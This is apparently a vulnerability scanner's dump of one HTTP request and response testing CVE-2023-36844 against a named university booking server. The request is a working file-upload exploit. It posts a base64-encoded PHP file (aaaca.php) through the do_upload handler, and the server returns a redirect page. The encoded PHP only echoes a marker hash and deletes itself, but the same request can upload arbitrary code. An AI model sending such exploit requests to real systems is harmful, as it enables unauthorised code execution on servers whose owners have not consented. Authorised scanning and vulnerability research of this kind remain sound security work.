[CVE-2023-36844] Dumped HTTP request for https://bookings.mdhs.unimelb.edu.au/webauth_operation.php


POST /webauth_operation.php HTTP/1.1
Host: bookings.mdhs.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,KCc8P3BocCBlY2hvIG1kNSgnQ1ZFLTIwMjMtMzY4NDQnKTt1bmxpbmsoX19GSUxFX18pOz8+Jyk=", "fileName": "aaaca.php", "csize": 56}]
[CVE-2023-36844] Dumped HTTP response https://bookings.mdhs.unimelb.edu.au/webauth_operation.php

HTTP/1.1 302 Found
Connection: close
Content-Length: 122
Cache-Control: no-cache, no-store
Content-Type: text/html
Location: https://bookings.mdhs.unimelb.edu.au/webauth_operation.php
Set-Cookie: visid_incap_3209806=Er8Fl2o+QsmRaw+VI9R17Ptxk2gAAAAAQUIPAAAAAABVvK3xy3o5TYfe+e7jAuDa; expires=Thu, 06 Aug 2026 07:06:48 GMT; HttpOnly; path=/; Domain=.mdhs.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_237_3209806=Gp+najcrODFY1Larov5JA/txk2gAAAAAVdIVCK+cZ4yvQ+1JJCiXzA==; path=/; Domain=.mdhs.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 1-1018289-0 0NNN RT(1754493436250 24) q(0 -1 -1 -1) r(0 -1) B13(1,10037,0) U24


<HTML><HEAD><TITLE>Loading</TITLE></HEAD><BODY bgcolor="#ffffff"><H3 style="color: #ffffff">Loading</H3></BODY></HTML>

